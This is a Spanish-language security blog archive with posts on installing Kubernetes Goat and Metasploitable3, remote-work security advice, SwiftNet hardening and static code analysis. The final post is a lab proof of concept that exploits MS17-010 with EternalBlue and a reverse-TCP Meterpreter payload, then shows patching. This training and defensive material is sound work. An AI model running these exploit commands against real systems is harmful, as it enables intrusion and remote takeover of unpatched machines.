Archivo
Install Kubernetes Goat (ES)
En estos dos ultimos años estoy muy involucrado en proyectos revisando intraestructuras basadas en contenedores Docker y Kubernetes, en esta busqueda encontré con este genial proyecto que facilita el aprendizaje de vulnerabilidades en Kubernetes.
Kubernetes Goat está diseñado para ser un entorno de clúster intencionalmente vulnerable para aprender y practicar la seguridad de Kubernetes. Es un proyecto creado por Madhu Akula.
En este articulo, veremos como realizar la instalación sobre un equipo con Ubuntu 20.04 y VirtualBox. Kubernetes Goat necesita una instalación previa de Minikube el cual facilita tener un cluster local de Kubernetes.
A.- Instalar Minikube
1.- Descarga de Minikube
Podemos descargar la última versión o una versión específica de la página de versiones de Minikube. Una vez descargado, necesitamos hacerlo ejecutable y agregarlo a nuestra RUTA:
$ curl -Lo minikube https://storage.googleapis.com/minikube/releases/latest/minikube-linux-amd64 && chmod +x minikube && sudo mv minikube /usr/local/bin/
2.- Iniciar Minikube
Podemos iniciar Minikube con el comando de inicio de minikube, que inicia un clúster de un solo nodo con la última versión estable de Kubernetes.
$ minikube start
3.- Comprobar el estado
Con el comando de estado de minikube, mostramos el estado de Minikube:
$ minikube status
B.- Instalar Kubernetes Goat
1.- Descargar el proyecto
# git clone https://github.com/madhuakula/kubernetes-goat.git
# cd kubernetes-goat/
2.- Configurar la cuenta helm2 rbac e inicializar tiller
# kubectl apply -f scenarios/helm2-rbac/setup.yaml
# helm2 init –service-account tiller
3.- Desplegar Helm chart para verificar la configuración ,
implementación del escenario helm chart metadata-db
# helm2 install –name metadata-db scenarios/metadata-db/
4.- Desplegar los manifiestos de escenarios vulnerables
# kubectl apply -f scenarios/batch-check/job.yaml
# kubectl apply -f scenarios/build-code/deployment.yaml
# kubectl apply -f scenarios/cache-store/deployment.yaml
# kubectl apply -f scenarios/health-check/deployment.yaml
# kubectl apply -f scenarios/hunger-check/deployment.yaml
# kubectl apply -f scenarios/kubernetes-goat-home/deployment.yaml
# kubectl apply -f scenarios/poor-registry/deployment.yaml
# kubectl apply -f scenarios/system-monitor/deployment.yaml
# kubectl apply -f scenarios/hidden-in-layers/deployment.yaml
5.- Crear el forwardeo de puertos en los PODS para permitir el acceso local.
# bash access-kubernetes-goat.sh
6.- Igresar a Kubernetes Goat
Si todo salio bien , ahora podremos ingresar a la aplicación de la siguiente forma:
Ingresar a : http://127.0.0.1:1234/
Finalmente, Si desean practicar los escenarios pueden revizarlos aqui : https://madhuakula.com/kubernetes-goat/index.html
Espero les siva
Ciberseguridad en tiempos de Coronavirus (Parte 3)
Recomendaciones para todos, Zoom y el acceso a redes empresariales.
En los post anteriores vimos Ciberataques en el mundo luego Ciberataques en Perú para cerrar este tópico aquí veremos una serie de recomendaciones que todos deberíamos considerar hasta recomendaciones mas especificas para entornos empresariales.
1.- Recomendaciones de uso General
- Hacer respaldos de información
- Use una contraseña segura.
- Use contraseñas diferentes para email personal, email corporativos,
redes sociales, etc. - Bloquee manualmente la pantalla o configurar la pantalla.
- del dispositivo para que se bloquee automáticamente al alejarse o al dejar de usarlo.
- Instalar las últimas actualizaciones de software y aplicaciones todos los dispositivos, Celulares, Tablets, PC, Laptop.
- Uso de software antivirus / anti malware comercial y licenciado.
- Verificar correos electrónicos, SMS o mensajes de redes sociales, si son de contactos conocidos.
- No hacer clic en direcciones de internet sin estar 100% seguro.
- No abrir archivos adjuntos si no esta 100% de su origen.
Aquí un estudio reciente donde se muestra las contraseñas mas comunes encontradas durante análisis de vulnerabilidades a nivel global :
Fuente : Raconteur: https://www.linkedin.com/posts/edgescan_raconteur-cybersecurity-report-activity-6648188015975899136-on2J/
2.- Recomendaciones para Zoom.
Como todos sabemos las plataformas de vídeo conferencia se han intensificados y Zoom se ha vuelto una de las principales, como si bien es cierto a la fecha de este post Zoom ha publicado una nueva versión con muchas mejoras de seguridad ademas de comprar una empresa de ciberseguridad para mejorar el cifrado de las comunicaciones los ciberdelincuentes siguen encontrando problemas de seguridad.
Basado en ello, aquí algunas recomendaciones para «mejorar» la seguridad en las conferencias.
- Agregar una contraseña de reunión.
- Establecer el uso compartido de pantalla en «solo host».
- Deshabilitar transferencia de archivos.
- Deshabilitar «unirse antes del host».
- Deshabilite «Permitir que los participantes eliminados vuelvan a unirse» Habilitar la sala de espera.
- No hacer clic en enlaces sospechosos o aceptar archivos en la sala de chat.
3.- Habilitar autenticación multifactor (2FA)
Adicionar un mecanismo para autentificar el acceso es altamente recomendable, teniendo en cuenta que tarde o temprano la contraseña termina siendo guarda en un archivo de texto ( algo que sabes) y puede ser robada fácilmente, contar con una contraseña dinámica (algo que tienes) es decir que cambia cada momento o es enviado por sms es sumantante importante.
Algunos servicios donde se puede activar :
- Correo electrónico personal, los printicales servicios de email como gmail, outlook, hotmail lo soportan.
- Correo electrónico corporativo ( si esto lo soporta).
- Redes Sociales : Facebook por ejemplo.
- Conexiones VPN (Acceso remoto a la red corporativa).
- Inicio de sesión en computadoras corporativas.
Aquí un ejemplo de como activarlo para Facebook :
4.- Acceso a redes empresariales
Debido al teletrabajo ha hecho que muchas empresas textualmente «corran» para implementar soluciones que permitan a sus empleados trabajar desde casa, sin embargo se estan perdiendo de vista ciertas cosas que exponemos a continuación.
4.1.- Acceso cifrado a la red empresarial
sea cual sea la solución para ingresar a la red empresarial, esta debe ser cifrada, como por ejemplo el uso de «servicio de escritorio remoto» o RDP en su configuración por defecto hace uso de cifrado, así mismo cuenta con vulnerabilidades como BlueKeep.
4.2.- Permitir el acceso solo a dispositivos de trabajo
Hoy todos están conectados desde casa, pero se esta viendo que el mismo computador/Laptop que venia siendo usado para el hogar, también esta siendo usado para conectarse a la red empresarial, por tanto si ese computador se encuentra comprometido de algun tipo de virus, también esta comprometiendo la red empresaria.
4.3.- Uso de software VPN sin vulnerabilidades.
Ningún software en ningun sistema operativo se «salva» de tener vulnerabilidaes, es importante que a la hora de implementar los servidores VPN el software a usar siempre sea la ultima version y este libre de vulnerabilidades, al menos en ese momento. Por ejemplo este es el reporte de vulnerabilidades OPENVPN a la fecha, el cual es uno de los software mas usados para implementar este tipo de acceso.
4.4.- Uso de protocolos seguros en VPN
Muchas implementaciones de Servidor VPN no tienen en cuenta que de nada sirve los accesos remotos sin hacer uso de un protocolo que brinde el correcto cifrado en la comunicación, es asi que hacer uso de PPTP sobre SSL o L2TP/IPsec SSTP y IKEv2/IPsec. solo por citar algunos es muy importante.
4.5.- De ser posible uso de 2FA.
Adicionar un mecanismo para autentificar el acceso es altamente recomendable, teniendo en cuenta que una contraseña normalmente se copia fisicamente en algún lado ( algo que sabes) contar con una contraseña dinámica es decir que cambia cada momento o es enviado por sms (algo que tienes) es importante.
A continuación una lista de soluciones basadas en software libre enfocadas a controles de seguridad.
Fuente : http://www.eventid.net/docs/open_source_security_controls.asp
5.- Evaluación de aplicaciones Web y visibilidad en la red empresarial
- Análisis de vulnerabilidades de Aplicaciones web y móviles.
- Revisión de visibilidad del perímetro de la red, ejemplo servicios expuestos.
- Actualización de software en servicios.
- Tratar de no usar servicios que no cifren la comunicación, ejemplo Telnet, FTP, RDP por defecto.
Un estudio de la empresa Edgescan revela las vulnerabilidades mas comunes en evaluaciones sin credenciales sobre sistemas expuestos por internet.
Fuente : https://cdn2.hubspot.net/hubfs/4118561/BCC030%20Vulnerability%20Stats%20Report%20(2020)_WEB.pdf
43% en vulnerabilidades en criptografia, implementaciones de servidor, clientes y APIs/Endpoints en el uso de algoritmos debiles.
20% en Aplicaciones Web, vulnerabilidades que comprometen la seguridad en Aplicaciones web, como XSS, CSRF, SQLI,etc.
15% Relacionado a falta de parches de seguridad, en diversas implementaciones como Apache, Cisco, Citrix, Vmware,etc.
Espero les sirva.
@jroliva
Ciberseguridad en tiempos de Coronavirus (Parte 1)
Para los que me conocen, saben que mi tipo de charla es normalmente técnicas y especializadas, sin embargo hace poco invitaron a brindar una charla denominada Ciberseguridad en tiempos de Coronavirus para el Instituto en el cual soy docente a tiempo parcial, me pidieron que prepare la charla para todo publico, respecto a la problemática actual, entonces se me ocurrió que basado en la charla, realizar este conjunto de publicaciones que de ante mano, espero sea de utilidad para todos, la misma estará dividida en las siguientes partes :
Parte 1 .- Ciberataques en el Mundo.
Parte 2 .- Ciberataques en Perú.
Parte 3.- Recomendaciones , generales y para todos y en el uso de Zoom y para el acceso a redes empresariales.
COVID-19 ha detenido el mundo, los Ciberataques se detuvieron?
Pues la respuesta es NO, de hecho han aumentado, por varios factores, entre ellos, el distanciamiento social y los estados de cuarentena en varios países, representan una gran oportunidad para los ciberdelincuentes, para desarrollar diversos tipos de “engaños” como los que veremos a continuación :
Ataques hacia Organizaciones.
Un ejemplo de ello es el que sufrió la misma Organización Mundial de la Salud (OMS) que enviaron correos electrónicos falsos a los empleados de esta organización, para comprometer o hackear sus equipos de computo, con el objetivo de robar información interna para luego ser comercializada al mejor postor seguramente.
Fuente : https://www.elconfidencial.com/tecnologia/2020-03-23/hackers-oms-salud-coronavirus_2514168/
Ataques hacia plataformas de vídeo conferencias.
Basado en el contexto, en donde se ha tenido que migrar hacia el aprendizaje a distancia, trabajo desde casa y demás usos, el que se ha llevado todos los premios en tener alertas de seguridad es Zoom, esto sin lugar a dudas es por que se convertido en la aplicación mas usada para este fin.
Es por ello, que era casi predecible, que iban a aparecer diversos tipos de “pruebas” de seguridad, recuerden los ciberdelincuentes buscan siempre en lugares/sitios/plataforma de uso masivo. Para aprovechar justamente las debilidades de seguridad, que se el caso de Zoom se encontraron en su momento, a tal punto que el mismo FBI y GOOGLE han recomendado no usarlo.
Cabe señalar que Zoom ha hecho grandes esfuerzos para corregir los problemas de seguridad, su CEO ha salido a dar la cara en varias oportunidades, indicando que están trabajando para corregir estos problemas, ya que son cocientes de la gran responsabilidad que tienen en esta pandemia, al convertirse la principal herramienta de comunicación en estos tiempos, sin embargo ya se pueden apreciar las consecuencias que dejaron estos problemas.
Recientemente, se difundido noticias que ya se comercializan usuarios y contraseñas en la red oscura.
Fuente : https://gbhackers.com/zoom-compromised-credentials/
El el siguiente articulo veremos recomendaciones para mejorar la seguridad en esta popular plataforma.
Malware Bancario que deja abajo servicios en la nube.
Emotet un malware especializado en robar cuentas bancarias tuvo un efecto muy particular en una red de Microsoft, ya que a raíz de que un usuario abrió un correo electrónico con ese malware, causo el sobre calentamiento de CPU de los servidores y consumo excesivo de ancho de banca produciendo in disponibilidad en los servicios de una de las redes de Microsoft Azure.
Fuente : https://computerhoy.com/noticias/tecnologia/malware-emotet-615999
El correo electrónico como transportador del virus.
Virus informático, puntualizando. Los ataques haciendo uso de correos electrónicos son un clásico desde la aparición de internet, a tal punto que en esta época de COVID-19 se han incrementado como hemos visto, así que vale la pena mencionar la siguiente diferenciación.
Phishing, ataque tradicional, haciendo la analogía mas certera, es como cuando un pescador lanza su red para ver cuantos peces puede capturar.
Spear-Phishing, es un envío de correos electrónicos muy focalizado en un individuo en especial o en un grupo es especial como el caso de la OMS, en este caso el Ciberdelincuente se esmera en crear normalmente un escenario de estafa para que los usuarios.
En la segunda parte veremos ataques focalizados en Perú.
búsqueda de vulnerabilidades mediante análisis de código fuente estático
Luego de terminar el año a full, regresar de unas pequeñas vacaciones me pongo al día con el blog ya que lo he tenido un poco descuidado. Como parte de las actividades en los proyectos de Ethical Hacking se tienen requerimientos para buscar vulnerabilidades en el código fuente de manera estática, es decir sin que la aplicación evaluada este ejecutándose, para realizar ello nos podemos ayudar en ciertas herramientas que pueden AYUDAR en realizar esto, y resalto AYUDAR por que ninguna herramienta va hacer el trabajo al 100% , siempre va ser necesario realizar un análisis posterior de los casos.
En este caso, vamos a aprender a instalar , configurar y usar Sonarqube es una herramienta que me a ayudado mucho en estas labores, este procedimiento se puede aplicar en Ubuntu 18.04.1 u otro derivado.
1.- Instalar java
sudo apt install openjdk-8-jdk openjdk-8-jre
2.- Crear directorio
mkdir sonarqube
2. -Descargar Sonarqube
Para ello es necesario ingresar a la pagina : https://www.sonarqube.org/downloads/
También es necesario descargar el escaner de : https://docs.sonarqube.org/display/SCAN/Analyzing+with+SonarQube+Scanner
Al descomprimir los archivos tendremos lo siguiente :
3.- Luego descargaremos un proyecto opensource como DVWA para analizarlo
Para esto descargaremos un viejo conocido como DVWA
4.- Ahora vamos a configurar el escaner
– Crear una carpeta «main» en la ruta sonar-scanner-3.2.0.1227-linux/bin
cd sonar-scanner-3.2.0.1227-linux/bin
mkdir main
– luego dentro de la carpeta «main» vamos a mover y descomprimir la carpeta de la aplicacion a analizar
mv DVWA-master.zip sonar-scanner-3.2.0.1227-linux/bin/main/
cd sonar-scanner-3.2.0.1227-linux/bin/main/
unzip DVWA-master.zip
– Ahora crear un archivo «sonar-project.properties» indicando la aplicación a evaluar de la siguiente forma
cd sonar-scanner-3.2.0.1227-linux/bin
vim sonar-project.properties
5.- Finalmente iniciamos el panel de sonar y luego escaner para iniciar el análisis
– Iniciar sonar
cd sonarqube/sonarqube-6.7.5/bin/linux-x86-64
./sonar.sh start
Sonar iniciara en el puerto 9000 del localhost de la siguiente forma
– Ahora iniciar el escaner
cd sonarqube/sonar-scanner-3.2.0.1227-linux/bin
./sonar-scanner
Como vemos el análisis del de las paginas se realizo correctamente.
6.- Análisis de resultados
Luego de que el escáner termine el análisis en el panel de sonar aparecerá un nuevo proyecto de la siguiente forma
Como vemos ahora tenemos un proyecto analizado, al ingresar veremos que tenemos catalogadas los bugs, vulnerabilidades, entre otros resultados.
Al ingresar a las vulnerabilidades, tendremos un listado de las mismas.
El siguiente paso es analizar cada una de las vulnerabilidades reportadas en el código para identificar la importancia de las mismas, su importancia en el modelo de negocio y por su puesto como poder corregirlas.
Espero que les sirva.
Saludos
Juan Oliva
Mikrotik Winbox server vulnerability
Hace unos meses recibía llamadas de algunos clientes preocupados debido a que sus empresas proveedoras de servicios de internet y de Voz los llamaban advirtiéndoles que sus equipos Mikrotik fueron comprometidos y que era necesario que revisen sus redes internas ante algún comportamiento «raro».
Así fue como comenzó todo, luego googleando un poco se encontraban muchas notificas referentes a que millones de estos routers fueron comprometidos para ser usados en campanas de «cryptojacking» es decir usaban los equipo para minar crytomendas, sin embargo como siempre todo fue la punta del iceberg.
Buscando el vector del ataque se reportaba que descubrió que servicio Winbox cuenta con una vulnerabilidad que permite a eludir la autenticación y leer archivos al modificar una solicitud para cambiar un byte relacionado con una ID de sesión, lo cual suena a mas de los mismo, fallas en el control de recepción de variables en determinados servicios, el cual fue catalogado como CVE-2018-14847
Valga las verdades el fabricante reporto la vulnerabilidad a fines de marzo de 2018 sin embargo siempre existe un tiempo en que los atacantes elaboran los programas para sacarle provecho a este tipo de vulnerabilidad y por supuesto nadie actualiza 😀 es por ello recién a mediados de agosto se desato el caos en las implementaciones que usaban esto equipos con la aparición de los exploits.
Para los que me conocen saben que Mikrotik no es de mis equipos preferidos, esto es debido a que lo venden como «Firewall de perímetro» es decir proteger a una red empresarial, cuando el equipo no es mas que un router, sabiendo que hoy para proteger una empresa necesita mas que abrir o cerrar puertos o un proxy básico en su mínima expresión como es el que maneja el RouterOS, sin embargo es evidente que el factor costo es importante comparado con equipos UTM, sumado al desconocimiento de los clientes ante integradores oportunistas.
Entonces sin mas, les comparto el procedimiento y el vídeo para hacer el P.O.C. de esta vulnerabilidad sobre Kali Linux
Espero les sirva!!
Saludos
Juan Oliva
SWIFT SWIFTNet Hacking en Redes Bancarias
Luego de ver la noticia del hackeo del banco de chile, lean la publicación de la nota de Cesar Farro que lo detalla desde su perspectiva externa, me animé a escribir algo referente a ello, ya que es casi un año que vengo involucrado en realizar análisis de seguridad y vulnerabilidades a redes SWIFT justamente.
Como detrás de este tipos de servicios existen NDA vigentes, voy a ser bastante pragmático al respecto, emitiendo lineamientos que desde mi punto de vista personal, y que tendrían que ser de sentido común para este tipo de redes y al final conclusiones al respecto.
Al grano, normalmente siempre se tiene la perspectiva por fuera y no necesariamente por dentro, ya que como se entenderá son arquitecturas muy cerradas y no en lo tecnológico necesariamente ( si no pregunten el al banco de Chile 😀 ) digo esto por que al final terminamos hablando de los mismos componentes de siempre, como sistema operativos Windows, Unix, estaciones de trabajo, aplicaciones web, bases de datos, es decir nada que en una red empresarial deja de tener, empecemos desmenuzando la idea.
1.- QUE ES SWIFT ?
De pronto lo que uno mas conoce es el famoso código SWIFT para realizar transferencias internacionales, detrás de ello esta la “Society for Woldwide Interbank Financial” la cual provee hardware/software que articula mediante programas y regulaciones en general toda esta actividad a la cual están afectas las entidades bancarias.
Dentro de los lineamientos se establecen arquitecturas de uso que pueden tener las entidad bancarias que se detallan a continuación :
Arquitectura A1 Full Stack
La interfaz de mensajería como la de comunicación están dentro del entorno del usuario. Este tipo de arquitectura también incluye soluciones alojadas donde el usuario tiene las licencias para la interfaz de mensajería y la interfaz de comunicación.
Arquitectura A2 Partial Stack
La interfaz de mensajería está dentro del entorno del usuario, pero un proveedor de servicios (para ejemplo, una agencia de servicios, SWIFT Alliance Remote Gateway o un centro de grupo) es licencia y administra la interfaz de comunicación. 
Arquitectura A3 – Connector
La aplicación de software (por ejemplo, Alliance Lite2 AutoClient, soluciones de transferencia de archivos) es utilizado en el entorno del usuario para facilitar la comunicación de aplicación a aplicación con una interfaz en un proveedor de servicios. 
Arquitectura B – No local user footprint
No se utiliza ningún componente de infraestructura específico de SWIFT dentro del entorno del usuario.
Fuente : https://www.accesspay.com/wp-content/uploads/2017/09/SWIFT_Customer_Security_Controls_Framework.pdf
2.- LOS CONTROLES
Dentro de las regulaciones a nivel de gestión de SWIFT solicita y obliga a cumplir los 27 controles ( obligatorios y recomendados) los mismos que están indicados en el “SWIFT Customer Security Controls Framework” al cual se puede acceder públicamente y además los empleados cursos como por ejemplo el “Customer security programme” entre otros.
Un detalle que se puede identificar en este contexto, es que las entidades tienen que cumplir todos los controles y no solo los obligatorios ya que el común es pensar con eso ya están aprobando, cuando es todo lo contrario.
Sobre el cumplimiento de los controles, desde mi punto de vista, si bien es cierto en general la especificación de los controles es buena, sin embargo también muchos de los controles son muy ambiguos y poco precisos.
Basado en ello, un auditor/empleado que solo conoce la parte de gestión, puede interpretar de manera muy ligera los mismos, por ejemplo hacer cumplir un control determinado con solo con un procedimiento general, por el contrario alguien que maneja de parte de ingeniería/técnica la va interpretar de manera mas puntual, por ejemplo con una captura de pantalla del sistema o componente técnico, donde se muestra que se hace efectivo el control.
Para finalizar este punto indicar que la red SWIFT de la entidad va ser tan antigua como la misma lo permita en funcion a lo de siempre, no actualizar su arquitectura.
3- Evaluaciones de Cyberseguridad
Dentro de los controles de SWIFT se exige que es necesario hacer una evaluación de Ciberseguridad / Ethical Hacking a todos los componentes que involucran la arquitectura SWIFT. Por otro lado también a nivel de regulador bancario en el caso del Perú por ejemplo es la SBC que también lo exige, entonces tienen por lo menos dos servicios que tienen que ejecutar en diferentes ámbitos.
En ese sentido, es clave definir bien los activos a evaluar, sistemas involucrados, las actividades contempladas y horarios de ejecución, es decir es necesario definir bien el alcance, de lo contrario como en otros ámbitos, este punto solo será un puro formalismo a cumplir en el informe como desarrollar un escaneo o un análisis de vulnerabilidades automatizado que pasa a los informes.
4.- CONCLUSIONES Y RECOMENDACIONES
– Contar con la zona segura exclusiva/aislada de todo y textualmente de TODO sin ningún tipo de enlace hacia la red empresarial y hacia internet, esto es fundamental pero es muy difícil sobre todo por temas en primera instancia de flexibilidad, recordar el viejo dicho “mientras mas mas seguro menos flexible” y por otro lado de presupuesto, ya que estamos hablando para comenzar de tener toda la parte de switching, firewall, controladores de dominio y demás dispositivos de la arquitectura, exclusivos para la red SWIFT totalmente separado y con una función única.
– PC de operador de uso exclusivo, es decir solo para uso de SWIFT, evitar uso de servidores de salto, maquinas virtuales, citrix, escritorios remotos y demás elementos, como sabemos la mayor brecha de seguridad la producen los usuarios finales e inevitablemente se tiene que usar Windows (ojo aquí con las actualizaciones de seguridad), es recomendable primero que las PC de operador que acceden a los aplicativos SWIFT sean de uso exclusivo para ello y estén dentro de la zona segura , evidentemente siguiendo estándares de aseguramiento muy rígidos (Que normalmente no lo aplican no solo a nivel del sistema operativo, si no a nivel físico, ejemplo, contraseña de bios, desactivar USB, no tener software innecesario, no tener salida a internet entre otras.
– Uso de doble factor de autenticación, uso de tokens RSA para no solo autenticar hacia las aplicaciones, si no también a nivel de sistema operativo de los PC operador, reduce la brecha de riesgo.
– Servidores de producción SWIFT , Desde mi punto de vista usar servidores Windows para los servidores de producción y respaldo que exige SWIFT, es un error, cuando es sabido que Solaris/Unix ofrecen una menor brecha de seguridad en cuanto a vulnerabilidades reportadas.
– Software de Mensajería SWIFT y arquitectura general SWIFT va ser tan actualizada o no, como la entidad bancaria lo decida, SWIFT provee actualizaciones bastante constantes por ejemplo para el software de mensajería, mediante boletines y es labor de los responsables estar capacitados para realizar ello.
Finalmente basado en lo que he visto la mayor brecha de seguridad esta en no tener una red segura, usuarios operadores con estaciones Windows multiproposito y el y uso Windows en los servidores de mensajería.
Espero les sirva.
Saludos
Juan Oliva
Metasploitable3 Practice labs
Como algunos saben, parte de mis actividades profesionales en seguridad informática están destinadas a los temas de capacitación y entrenamiento, es así que al desarrollar los ejercicios para un nuevo curso de Ethical Hacking, empecé a desarrollar los correspondientes a Metasploitable 3 Al terminar los ejercicios se me ocurrió crear este documento.
El objetivo del material es proporcionar una guía práctica para desarrollar la
explotación de vulnerabilidades en Metasploitable 3 desde la perspectiva de un
Pentester / Ethical Hacker.
La misma representa una recopilación de diversos tutoriales escritos y en vídeo, los
cuales han sido probados y modificados tratando de aplicar una metodología sencilla y
que sobre todo provea un marco de referencia para la evaluación de vulnerabilidades.
Todas las instrucciones del presente material fueron realizadas con Kali Linux y con la
instalación de Metasploitable3 realizada en este enlace:
https://jroliva.net/2018/01/21/instalacion-metasploitable3/
Descarga : http://www.silcom.com.pe/papers/Paper_Metasploitable3_Practice_labs.pdf
Espero les sirva
Juan Oliva.
Instalación de Metasploitable3 en Linux Mint/Ubuntu
Todos los que estamos relacionados en el mundo de Ethical Hacking y el Pentesting hemos usado Metasploitable la cual es una maquina virtual permite desarrollar ataques utilizando Metasploit Framework. La misma es utilizado para una diversidad de propósitos; como entrenamientos para la explotación de red, desarrollo de exploits, evaluación de software, entre otros propósitos. Metasploitable hasta la versión 2 era un disco duro la cual se instalaba fácilmente sobre VirtualBox o Vmware, sin embargo desde le 2012 que no se actualizaba y poco a poco venia perdiendo vigencia.
El año pasado la empresa Rapid7 creadores de la misma lanzaron la nueva versión «Metasploitable3» la misma que hasta la fecha está basada en Windows lo cual cambia bastante toda la lógica llevada hasta el momento, ya que su predecesor estaba basado en Linux.
Sin embargo esta nueva maquina tiene una serie de vulnerabilidad actuales muy interesantes que vale la pena revisar, a continuación veremos la forma de instalar la maquina, ya que la instalación de esta versión ha cambiado mucho.
Escenario :
S.O. Ubuntu Xenial 16.04
VirtualBox 5.2.4
1- Instalación de Prerrequisitos
Packer
wget https://releases.hashicorp.com/packer/1.1.3/packer_1.1.3_linux_amd64.zip?_ga=2.259436163.8806393.1516559508-2105737727.1516559508 -O packer_1.1.3_linux_amd64.zip
unzip packer_1.1.3_linux_amd64.zip
sudo mkdir /usr/local/packer
sudo mv packer /usr/local/packer/
nano ~/.profile
Al final del archivo agregar : export PATH=$PATH:/usr/local/packer
Luego el comando : source ~/.profile
Si todo salio bien al realizar el comando packer –version deberá responder de la siguiente forma.
Vagrant
wget https://releases.hashicorp.com/vagrant/2.0.1/vagrant_2.0.1_x86_64.deb?_ga=2.260144013.1615441003.1516560525-1954706866.1516560525 -O vagrant_2.0.1_x86_64.deb
sudo dpkg -i vagrant_2.0.1_x86_64.deb
vagrant plugin install vagrant-reload
Si todo salio bien deberíamos tener esta respuesta :
2.- Instalación de Metasploitable3
git clone https://github.com/rapid7/metasploitable3.git
cd metasploitable3/
Ahora comenzar con la construcción de la maquina virtual con el siguiente comando
packer build windows_2008_r2.json
Con ello, comenzara a descargar la ISO de Windows 2008 por tanto habrá que esperar a la descarga 😀
Luego comienza la construcción de la maquina virtual
Una vez finalizado el proceso nos mostrara lo siguiente :
Ahora proceder con el segundo paso de la construcción con el siguiente comando
vagrant box add windows_2008_r2_virtualbox.box –name=metasploitable3
Una vez culminado finalizamos la construcción de la maquina con el comando que la importa hacia VirtualBox :
vagrant up
Con ello tenemos finalizada la construcción de la maquina y la tendremos en la lista de maquina virtuales de virtual Box
Luego de identificarla corremos un nmap y vemos que tiene varios servicios para explorar.
3.- Guias
Finalmente les comparto algunas guías para que puedan practicar con Metasploitable3
http://www.hackingarticles.in/manual-penetration-testing-metasploitable-3/
http://ultimatepeter.com/metasploitable-3-meterpreter-port-forwarding/
http://www.hackingarticles.in/ftp-service-exploitation-metasploitable-3/
http://www.hackingarticles.in/penetration-testing-metasploitable-3-smb-tomcat/
http://www.hackingarticles.in/exploitation-metasploitable-3-using-glassfish-service/
http://www.hackingarticles.in/hack-metasploitable-3-using-mysql-service-exploitation/
Espero les sirva.
Saludos
Juan Oliva
@jroliva
Asegurando Issabel PBX – «La receta»
Existen ciertas cosas en la vida que valoro mucho y es el esfuerzo y la capacidad para poder trabajar en Equipo, ya que es muy difícil de conseguir, puesto que nuestra naturaleza humana nos lleva siempre a defender nuestros intereses personales, que muchas veces no son del bien común del equipo o en este caso de la comunidad que persigue un objetivo.
En eso puedo resumir de lo que pude apreciar luego de asistir al #BeFree17 en la ciudad de México, un equipo de diferentes países y continentes inclusive, trabajando como una comunidad para un objetivo común, difundiendo conocimiento y tratando de sacar adelante un proyecto.
Por otro lado también considero que el conocimiento debe ser libre, como parte de la constante creación de nuevas cosas e ideas, con todas estas cosas rondando en mi cabeza, es me puse a trabajar en este paper cuya base fue la presentación que realice el miércoles pasado.
Lo titulé : Asegurando Issabel PBX – «La Receta» El objetivo del documento es guiar de una manera muy sencilla, con una serie de ingredientes bastante prácticos, en la mejora de algunos aspectos relacionados con la seguridad de la plataforma de comunicaciones Issabel PBX, tanto para servidores implementados en la nube, así como en instalaciones locales.
Como saben Issabel es una plataforma de comunicaciones Software Libre y código abierto basada en Asterisk (Digium the Asterisk Company) integra funcionalidades de PBX, correo electrónico, tareas de colaboración, así como vídeo llamadas.
Todas las instrucciones del presente material fueron realizadas con la versión que
corresponde al archivo ISO issabel4-USB-DVD-x86_64-20170621.iso.
El documento lo pueden descargar desde aquí :
Paper_Asegurando_Issabel_PBX-La_Receta
Espero les sirva
Juan Oliva
Explotando Vulnerabilidad MS17-010 o WannaCry
El pasado 12 de Mayo durante el desarrollo del Peruhack en Lima-Perú estallaba la noticia de un ataque global del ahora famoso ramsomware «Wanacry» arrasando múltiples empresas, grandes y extra grandes.
La duda es, como funciona Wanacry ?
El punto de entrada inicial no era muy diferente a los ramsomware que han aparecido anteriormente y se trata de infección via corre electrónico atraves de adjuntos con malware que explotaba una vulnerabilidad hasta esa fecha «no tan conocida» luego se expandía por la redes colindantes explotando la misma vulnerabilidad.
Ello es en resumen, técnicamente hablando , la vulnerabilidad que explotada por el ransomware WanaCrypt0r o WanaCry es la denominada por el boletin oficial de Microsoft como MS17-010 la cual afecta primordialmente a Windows 7 y Windows 2008 server que fue remediada por Microsoft el 14 de marzo es decir existe un parche desde esa fecha. El tema es que existe una herramienta llamada «EternalBlue» liberada por ShadowBrokers ( un grupo de hackers involucrados en el hackeo a la NSA) la cual explota la vulnerabilidad y afecta al protocolo SMB ( Servicio para compartir archivos e impresoras) que ahora está portada a Mestasploit por Elevenpaths.
Es por ello que su propagación fue masiva debido a que basta que una sola maquina se infecte para que se propague en toda una red LAN.
A continuación vamos a hacer una prueba de concepto paso a paso de como se explota la vulnerabilidad y luego aplicaremos el parche y probaremos nuevamente.
Escenario
Atacante : Kali Linux 2016_1 / IP 192.168.56.102
Atacado : Windows 7 64Bits / IP 192.168.56.101
1- Detección de Vulnerabilidad MS17-010 (Wanacry) con Nmap
cd /usr/share/nmap/scripts
wget https://raw.githubusercontent.com/cldrn/nmap-nse-scripts/master/scripts/smb-vuln-ms17-010.nse
nmap -d -sC -p445 –script smb-vuln-ms17-010.nse 192.168.56.101
Como se puede ver el scrip de nmap nos indica que el sistema operativo es vulnerable a ms17-010 ,con la confirmación vamos a explotar.
2- Explotando la Vulnerabilidad MS17-010 (Wanacry) con Metasploit
2.1- Instalación del exploit Eternalblue-Doublepulsar en Metasploit
cd /root
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git
cp /root/Eternalblue-Doublepulsar-Metasploit/eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/
2.2..- Atacando Windows 7 64Bits vulnerable
msfconsole
use exploit/windows/smb/eternalblue_doublepulsar
show info
show targets
set TARGET 8
set PAYLOAD windows/meterpreter/reverse_tcp
set PROCESSINJECT explorer.exe
set LHOST 192.168.56.102
set LPORT 4444
set RHOST 192.168.56.101
exploit
Como vemos se genera la sesión de Meterpreter
2.1- Aplicando Parche y Probando que la vulnerabilidad
2.1- Aplicando Parche UPDATE de seguridad para MS17-010
Descargamos la actualización oficial desde :
http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012212
Aplicamos el parche
2.2- Validando que la vulnerabilidad fue parchada
Validando con Nmap
Validando nuevamente con Metasploit
Como vemos luego de a ver aplicado el parche ya no es posible tomar el control del sistema, asi que a realizar las actualizaciones antes que se infecten.
Saludos
Juan Oliva
@jroliva
Juan Oliva 